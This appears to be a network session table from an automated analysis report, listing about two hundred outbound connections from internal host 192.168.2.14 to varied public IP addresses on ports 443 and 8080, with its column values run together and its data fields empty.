                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15784192.168.2.1440464129.173.196.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15785192.168.2.145977690.181.28.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15786192.168.2.144194040.99.178.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15787192.168.2.1436140173.162.200.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15788192.168.2.143493020.185.31.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15789192.168.2.1445062177.207.190.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15790192.168.2.1433646140.163.242.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15791192.168.2.145883634.149.231.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15792192.168.2.1457778204.105.150.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15793192.168.2.144451825.220.148.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15794192.168.2.1439928191.197.186.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15795192.168.2.144446886.237.36.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15796192.168.2.1441282137.75.189.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15797192.168.2.1445918126.95.194.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15798192.168.2.1447246200.201.64.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15799192.168.2.1443680130.152.87.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15800192.168.2.145968219.244.86.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15801192.168.2.1451126221.165.117.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15802192.168.2.144411285.34.28.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15803192.168.2.1439630105.18.168.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15804192.168.2.1446348140.184.20.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15805192.168.2.1437540151.92.7.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15806192.168.2.144427420.141.193.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15807192.168.2.1441428177.55.157.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15808192.168.2.1434736141.211.91.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15809192.168.2.1450360142.138.64.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15810192.168.2.1441934171.203.63.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15811192.168.2.1447162174.215.15.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15812192.168.2.145763077.35.77.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15813192.168.2.145752614.120.203.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15814192.168.2.145272023.238.178.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15815192.168.2.1442526111.95.157.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15816192.168.2.144442281.82.144.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15817192.168.2.145249058.164.142.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15818192.168.2.144574081.79.55.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15819192.168.2.145869227.150.141.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15820192.168.2.1440680169.134.132.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15821192.168.2.144732097.147.152.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15822192.168.2.1435812107.116.27.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15823192.168.2.1449068218.161.218.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15824192.168.2.14585528.246.60.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15825192.168.2.1441750210.27.126.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15826192.168.2.1457838146.60.99.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15827192.168.2.1452176159.230.71.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15828192.168.2.1455426112.252.251.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15829192.168.2.1457148157.107.178.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15830192.168.2.144133463.165.227.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15831192.168.2.1451524152.221.255.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15832192.168.2.1457248147.105.175.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15833192.168.2.1438188223.103.168.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15834192.168.2.1452652198.134.176.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15835192.168.2.1441120198.151.215.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15836192.168.2.1443982183.235.248.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15837192.168.2.1457560191.129.228.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15838192.168.2.1454158175.198.76.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15839192.168.2.146075631.213.146.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15840192.168.2.1449938171.104.3.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15841192.168.2.1446224151.227.37.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15842192.168.2.1449858133.214.169.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15843192.168.2.1439766194.115.50.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15844192.168.2.1459450178.97.31.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15845192.168.2.14342009.46.151.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15846192.168.2.1458538149.161.82.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15847192.168.2.1445782103.144.164.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15848192.168.2.143597872.114.193.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15849192.168.2.143919613.96.42.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15850192.168.2.1433440183.191.90.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15851192.168.2.146022471.77.164.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15852192.168.2.143864077.61.132.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15853192.168.2.1437270141.234.46.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15854192.168.2.1448124101.195.235.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15855192.168.2.1438890112.187.10.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15856192.168.2.1439300147.77.225.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15857192.168.2.1449450113.251.73.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15858192.168.2.144383249.118.214.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15859192.168.2.1457698106.165.98.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15860192.168.2.145652854.120.123.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15861192.168.2.1454660142.89.133.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15862192.168.2.1438866151.83.130.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15863192.168.2.144128673.119.60.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15864192.168.2.1454962210.70.185.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15865192.168.2.1440554157.35.212.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15866192.168.2.1449744191.48.232.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15867192.168.2.1443650145.14.223.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15868192.168.2.1453854162.31.76.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15869192.168.2.1437430201.173.38.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15870192.168.2.1433684186.50.19.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15871192.168.2.1456136181.134.253.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15872192.168.2.1454892151.157.70.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15873192.168.2.1434328222.103.64.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15874192.168.2.145875277.206.45.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15875192.168.2.14469648.169.114.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15876192.168.2.145666225.170.206.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15877192.168.2.1453816102.132.23.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15878192.168.2.145879073.15.254.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15879192.168.2.144492836.35.253.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15880192.168.2.143906440.66.133.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15881192.168.2.143893686.211.47.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15882192.168.2.1446722115.77.188.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15883192.168.2.1443430181.105.33.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15884192.168.2.1448260145.122.145.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15885192.168.2.1445080125.134.246.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15886192.168.2.1451858140.212.162.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15887192.168.2.1438816121.218.82.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15888192.168.2.143743099.149.210.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15889192.168.2.143691895.229.90.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15890192.168.2.1454956136.107.70.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15891192.168.2.144073251.123.8.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15892192.168.2.1459664116.142.248.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15893192.168.2.1435692220.97.216.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15894192.168.2.1436308202.126.170.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15895192.168.2.14541064.72.86.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15896192.168.2.1445162117.172.75.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15897192.168.2.1453734101.106.174.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15898192.168.2.1457622166.34.228.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15899192.168.2.1441886212.68.17.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15900192.168.2.1458880108.82.219.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15901192.168.2.1435320217.115.164.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15902192.168.2.145804291.72.90.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15903192.168.2.144449496.186.8.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15904192.168.2.1455062160.173.233.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15905192.168.2.145559474.40.83.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15906192.168.2.144110065.19.55.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15907192.168.2.1445328217.28.170.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15908192.168.2.1447118156.191.161.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15909192.168.2.1434222116.207.84.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15910192.168.2.146011491.143.117.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15911192.168.2.14599841.133.65.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15912192.168.2.144896282.144.109.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15913192.168.2.1444326105.220.7.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15914192.168.2.1451648223.20.111.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15915192.168.2.1455618201.183.95.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15916192.168.2.145729851.147.31.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15917192.168.2.144524877.10.99.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15918192.168.2.146075490.0.28.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15919192.168.2.1460194122.242.246.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15920192.168.2.144470043.155.181.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15921192.168.2.146006818.225.131.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15922192.168.2.1443466167.242.122.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15923192.168.2.143620619.1.132.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15924192.168.2.1446824202.4.82.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15925192.168.2.1443018164.242.95.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15926192.168.2.145858886.79.19.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15927192.168.2.1448538134.114.106.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15928192.168.2.1459728121.208.186.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15929192.168.2.144859246.87.219.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15930192.168.2.1439380161.244.71.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15931192.168.2.1446664188.62.74.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15932192.168.2.146000659.169.170.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15933192.168.2.1460972159.195.203.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15934192.168.2.145989631.185.28.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15935192.168.2.144427098.73.198.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15936192.168.2.1453018161.30.18.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15937192.168.2.1434590139.95.137.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15938192.168.2.1456188158.109.30.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15939192.168.2.1446160146.78.99.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15940192.168.2.1450580172.171.173.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15941192.168.2.1439208112.28.192.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15942192.168.2.1453724145.81.156.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15943192.168.2.1436744135.195.23.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15944192.168.2.1458208100.238.86.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15945192.168.2.146080644.34.180.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15946192.168.2.145419445.97.141.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15947192.168.2.144536627.146.67.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15948192.168.2.1434940177.185.53.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15949192.168.2.144418424.89.148.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15950192.168.2.1441260106.58.74.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15951192.168.2.144231245.198.4.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15952192.168.2.1444072183.140.101.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15953192.168.2.1448362114.122.112.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15954192.168.2.145958035.41.98.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15955192.168.2.144468831.11.45.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15956192.168.2.144078889.129.119.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15957192.168.2.1439302100.3.128.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15958192.168.2.1460186161.12.78.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15959192.168.2.144006236.3.158.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15960192.168.2.145829677.126.218.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15961192.168.2.143309271.130.254.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15962192.168.2.1438698222.12.204.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15963192.168.2.144447258.247.52.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15964192.168.2.1457830136.75.214.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15965192.168.2.1441430191.250.148.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15966192.168.2.1436608107.95.163.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15967192.168.2.1449160142.122.210.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15968192.168.2.143895219.78.31.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15969192.168.2.143938685.7.109.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15970192.168.2.14544924.118.113.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15971192.168.2.1434074164.124.151.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15972192.168.2.145019283.249.153.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15973192.168.2.1434034164.73.65.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15974192.168.2.1453516185.238.234.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15975192.168.2.1440304185.19.103.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15976192.168.2.14567841.167.214.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15977192.168.2.145577239.146.116.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15978192.168.2.145359613.135.13.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15979192.168.2.144120044.186.77.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15980192.168.2.1460594143.194.208.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15981192.168.2.1446142111.232.197.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15982192.168.2.144121273.39.60.768080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15983192.168.2.1448280101.69.225.1398080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15984192.168.2.143842071.14.98.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15985192.168.2.143548695.49.93.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15986192.168.2.1455488152.39.7.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15987192.168.2.143586452.157.99.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15988192.168.2.14589922.41.123.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15989192.168.2.144244019.69.188.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15990192.168.2.144161252.159.201.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15991192.168.2.1448496172.239.191.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15992192.168.2.1452022149.247.28.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15993192.168.2.144691436.247.23.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15994192.168.2.145019437.200.83.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15995192.168.2.1446726125.57.166.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
